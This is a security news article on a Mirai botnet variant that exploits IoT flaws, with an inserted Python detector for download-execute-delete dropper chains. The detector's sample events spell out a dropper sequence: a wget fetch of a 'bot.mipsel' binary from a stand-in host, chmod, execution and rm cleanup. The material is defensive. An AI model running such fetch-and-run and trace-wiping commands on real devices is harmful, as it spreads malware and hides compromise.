Mirai Variant Exploits Multiple IoT Vulnerabilities in New Attack Wave

A new variant of the notorious Mirai botnet has emerged, targeting a range of IoT vulnerabilities in an ongoing campaign observed since March 2023. Researchers at Palo Alto Networks' Unit 42 have identified threat actors exploiting these vulnerabilities to gain complete control over compromised devices, enabling them to launch further attacks, including devastating DDoS attacks.


The recently spotted Mirai botnet variant has been observed in two separate campaigns, which began on March 14 and experienced spikes in activity during April and June. This variant specifically targets approximately 22 known security flaws in various connected products such as routers, DVRs, NVRs, WiFi communication dongles, thermal monitoring systems, access control systems, and solar power generation monitors. Among the affected products are those manufactured by industry leaders such as D-Link, Nagios, Arris, Zyxel, TP-Link, SolarView, Nortek, Tenda, and MediaTek.


The attack chain commences by exploiting one of these vulnerabilities, paving the way for the execution of a shell script fetched from an external resource. This script downloads a botnet client tailored to the compromised device's architecture, including armv4l, arm5l, arm6l, arm7l, mips, mipsel, sh4, x86_64, i686, i586, arc, m68k, and sparc. After the bot client is executed, the shell script downloader deletes the downloaded client file to erase traces of the infection and minimize the likelihood of detection.
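The download-execute-delete sequence described above is the part of the chain a defender can see in process telemetry on the device or on a monitoring host. The following is an added detection example written for this page, not code from the article or from Unit 42: it walks a list of constructed process events, groups them by parent process, and flags a parent whose children fetch a file, execute a file named after one of the architecture labels listed above, and then remove it. The event format, the `ProcEvent` record, and the sample command lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Architecture labels named in the report: the downloader picks a bot binary per target architecture.
ARCH_LABELS = ("armv4l", "arm5l", "arm6l", "arm7l", "mips", "mipsel", "sh4",
               "x86_64", "i686", "i586", "arc", "m68k", "sparc")

DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b")
CLEANUP_RE = re.compile(r"\brm\s+(-\w+\s+)*\S+")


@dataclass
class ProcEvent:
    """Hypothetical process-execution record (assumed shape, not a real telemetry format)."""
    ts: int        # monotonic timestamp
    pid: int
    ppid: int      # parent pid; children of the dropper script share one ppid
    cmdline: str


def arch_labels_in(cmd):
    """Return the architecture labels that appear as whole tokens in a command line.

    Boundaries exclude letters and digits so 'arc' does not match inside 'sparc'
    and 'mips' does not match inside 'mipsel', while 'bot.mips' still matches."""
    return [a for a in ARCH_LABELS
            if re.search(r"(?<![A-Za-z0-9])" + re.escape(a) + r"(?![A-Za-z0-9])", cmd)]


def looks_like_exec(cmd):
    """True when the command marks a file executable or runs a file by path."""
    tokens = cmd.split()
    if not tokens:
        return False
    return tokens[0] == "chmod" or "/" in tokens[0]


def detect_dropper_chains(events):
    """Flag parent processes whose children show download -> arch-named execution -> cleanup.

    An alert is raised once an architecture-named file is executed after a download;
    the 'cleanup' flag records whether the trace-removal step was also observed."""
    by_parent = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_parent.setdefault(ev.ppid, []).append(ev)

    alerts = []
    for ppid, children in by_parent.items():
        stage = 0          # 0 nothing, 1 download seen, 2 arch-named exec seen, 3 cleanup seen
        arches = set()
        for ev in children:
            cmd = ev.cmdline
            if stage == 0 and DOWNLOAD_RE.search(cmd):
                stage = 1
                arches.update(arch_labels_in(cmd))
            elif stage == 1 and looks_like_exec(cmd) and arch_labels_in(cmd):
                stage = 2
                arches.update(arch_labels_in(cmd))
            elif stage == 2 and CLEANUP_RE.search(cmd):
                stage = 3
        if stage >= 2:
            alerts.append({"ppid": ppid, "arches": sorted(arches), "cleanup": stage == 3})
    return alerts


# Constructed sample events: one dropper-style chain (parent pid 501) and one benign
# firmware update (parent pid 600) that downloads a file but never runs an arch-named binary.
EVENTS = [
    ProcEvent(100, 501, 1,   "/bin/sh -c /tmp/installer.sh"),
    ProcEvent(101, 502, 501, "wget http://loader.invalid/bins/bot.mipsel -O /tmp/bot.mipsel"),
    ProcEvent(102, 503, 501, "chmod +x /tmp/bot.mipsel"),
    ProcEvent(103, 504, 501, "/tmp/bot.mipsel"),
    ProcEvent(104, 505, 501, "rm -f /tmp/bot.mipsel /tmp/installer.sh"),
    ProcEvent(200, 601, 600, "curl -s https://updates.example.invalid/firmware.bin -o /tmp/firmware.bin"),
    ProcEvent(201, 602, 600, "sh /tmp/apply_update.sh"),
]

if __name__ == "__main__":
    for alert in detect_dropper_chains(EVENTS):
        print(alert)
```

The check keys on the ordering of the three steps under one parent rather than on any single command, so a routine firmware download that never executes an architecture-named file stays quiet, while a chain that downloads, runs and then deletes such a file is reported together with the architecture it targeted.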


The proliferation of Mirai-inspired botnets continues to be a pressing concern. Recently, the Shadowserver Foundation reported active exploitation of a command injection flaw in Zyxel gear by a botnet resembling Mirai. Additionally, a variant known as IZ1H9 has been implicated in large-scale network attacks targeting Linux-based servers and networking devices. In February, another Mirai variant, identified as V3G4, leveraged 13 distinct vulnerabilities across three separate campaigns to unleash massive DDoS attacks.


As the abuse of IoT devices remains a persistent threat, organizations must remain vigilant. With the increasing popularity of Mirai and its variants among threat actors, it is crucial for organizations to prioritize device security by promptly applying the latest security patches. By doing so, they can mitigate the risk of falling victim to these evolving botnet threats.
